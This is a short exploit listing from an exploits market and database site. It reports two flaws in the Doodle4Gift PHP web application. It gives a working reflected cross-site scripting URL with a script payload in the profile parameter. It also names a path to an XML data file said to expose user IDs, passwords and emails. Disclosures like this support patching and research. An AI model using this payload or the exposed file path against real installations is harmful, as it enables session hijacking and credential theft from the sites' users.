[ authorization ] [ registration ] [ restore account ]
Contact us
You can contact us by:
0day Today Exploits Market and 0day Exploits Database

Doodle4Gift - Multiple Vulnerabilities

Author
Dr.NaNo
Risk
[
Security Risk Medium
]
0day-ID
0day-ID-21782
Category
web applications
Date add
21-01-2014
Platform
php
# Exploit Title :  Doodle4Gift <= Multiple Vulnerabilities
# Author        :  Dr.NaNo
# Date          :  H-1435/3/18 - 2014/1/19
# Software Link :  http://www.hotscripts.com/listing/doodle4gift/
# Software Link2:  https://sites.google.com/site/doodle4gift/
#
#
#            (1) Cross Site Scripting (XSS):
#
#
#      http://localhost/{path}/index.php?action=showprofile&profile=(XSS)
#
#      http://localhost/{path}/index.php?action=showprofile&profile=<script>alert('Dr.nano')</script>
#   
#   
#
#            (2) information disclosure:
#
#
#      http://localhost/{path}/data/doodle4gift.xml <= there are {Id,Password,Email} :)
#
#
#
#                  A special gift for: (P0c Team),(V4-Team):إهداءً خاصاً لـ

#  0day.today [2024-12-25]  #